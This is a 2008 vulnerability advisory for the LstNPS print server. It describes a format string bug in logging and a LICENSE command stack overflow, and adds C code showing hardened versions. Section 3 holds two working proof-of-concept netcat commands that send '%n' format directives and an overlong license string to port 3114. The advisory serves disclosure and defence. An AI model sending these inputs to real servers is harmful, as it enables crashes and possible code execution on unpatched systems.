Format string and buffer-overflow in Lst Network Print Server 9.4.2 build 105

Type securityvulns
Reporter Securityvulns
Modified 2008-02-12T00:00:00


                         Luigi Auriemma

Application:  Larson Software Technology Network Print Server
Versions:     <= 9.4.2 build 105
Platforms:    Windows
Bugs:         A] format string in logging
              B] license buffer-overflow
Exploitation: remote
Date:         11 Feb 2008
Author:       Luigi Auriemma
e-mail:
web:

1) Introduction
2) Bugs
3) The Code
4) Fix

===============
1) Introduction
===============

LstNPS is a CGM print server for Windows.

=======
2) Bugs
=======

A] format string in logging

The server is affected by a format string vulnerability in its logging functions (enabled by default at the "Information" level, so no configuration change is needed to reach it): the log message, which carries the client-supplied command, is passed to vsnprintf as the format string itself instead of as an argument to a fixed format. A remote client can therefore embed directives such as %s (reads through stack values as pointers) and %n (writes to memory), as the proof of concept in section 3 shows.

B] license buffer-overflow

The handler for the LICENSE command copies the license string into a 128-byte stack buffer with strncpy, but the length bound it passes does not limit the copy to the size of that buffer, so a license string longer than 128 bytes overflows the stack buffer.

===========
3) The Code
===========

A] format string in logging:

   echo USEP %n%n%n%s%s%s|nc SERVER 3114 -v -v

B] license buffer-overflow:

   echo LICENSE aaaaa...160...aaaaa|nc SERVER 3114 -v -v
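The two bug classes described in section 2, shown beside their hardened shapes, as an added example that is not LstNPS code and not part of the original advisory. The function names (render_log, handle_license, make_license_payload), the 256-byte log line buffer and the exact form of the strncpy misuse are assumptions; the advisory only states that the log message reaches vsnprintf as the format string and that the LICENSE copy into a 128-byte stack buffer is not bounded by the buffer size. The inputs mirror the two proof-of-concept commands above and are constructed here, not captured traffic.

```c
#include <stdio.h>
#include <string.h>

/* Size of the stack buffer the advisory says the LICENSE handler uses. */
#define LICENSE_BUF 128
#define PAYLOAD_MAX 512

static char g_logline[256];          /* hypothetical log line buffer   */
static char g_license[LICENSE_BUF];  /* hypothetical stored license    */
static char g_payload[PAYLOAD_MAX];  /* scratch for constructed input  */

/* Bug A, vulnerable shape (kept as a comment so it is never executed):
 *
 *     void log_bad(const char *fmt_from_client, ...) {
 *         va_list ap; va_start(ap, fmt_from_client);
 *         vsnprintf(g_logline, sizeof g_logline, fmt_from_client, ap);
 *         va_end(ap);
 *     }
 *
 * The client command is the format string, so "USEP %n%n%n%s%s%s" makes
 * vsnprintf dereference stack slots (%s) and write to them (%n).
 *
 * Hardened shape: the client data is an argument to a fixed format, so
 * '%' characters in it are copied literally and never interpreted. */
const char *render_log(const char *client_msg)
{
    snprintf(g_logline, sizeof g_logline, "[Information] %s", client_msg);
    return g_logline;
}

/* Bug B, one common way to get strncpy wrong (assumption; the advisory
 * does not say which bound was used), comment only:
 *
 *     char buf[128];
 *     strncpy(buf, arg, strlen(arg));   // bound taken from the source,
 *                                        // so a 160-byte arg overruns buf
 *
 * Even strncpy(buf, arg, sizeof buf) is not a full fix: it stops the
 * overrun but leaves buf without a NUL when arg is 128 bytes or longer.
 * Hardened shape: measure first, reject what does not fit, then copy with
 * an explicit terminator. Returns 0 on success, -1 on rejection. */
int handle_license(const char *payload)
{
    const char *prefix = "LICENSE ";
    size_t plen = strlen(prefix), alen;

    if (strncmp(payload, prefix, plen) != 0)
        return -1;                      /* not a LICENSE command        */
    alen = strlen(payload + plen);
    if (alen >= LICENSE_BUF)
        return -1;                      /* no room for the terminator   */
    memcpy(g_license, payload + plen, alen);
    g_license[alen] = '\0';
    return 0;
}

const char *stored_license(void)
{
    return g_license;
}

/* Constructed input: "LICENSE " followed by n 'a' bytes, as in the PoC. */
const char *make_license_payload(size_t n)
{
    const char *prefix = "LICENSE ";
    size_t plen = strlen(prefix);

    if (n > PAYLOAD_MAX - plen - 1)
        n = PAYLOAD_MAX - plen - 1;
    memcpy(g_payload, prefix, plen);
    memset(g_payload + plen, 'a', n);
    g_payload[plen + n] = '\0';
    return g_payload;
}

int main(void)
{
    printf("%s\n", render_log("USEP %n%n%n%s%s%s"));
    printf("LICENSE with 127 bytes: %d\n", handle_license(make_license_payload(127)));
    printf("LICENSE with 160 bytes: %d\n", handle_license(make_license_payload(160)));
    return 0;
}
```

The boundary worth checking is 127 versus 128 bytes: a 128-byte license fills the buffer with no room for the terminator, which is why the hardened handler rejects at `alen >= LICENSE_BUF` rather than `alen > LICENSE_BUF`.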

======
4) Fix
======

No Fix

Luigi Auriemma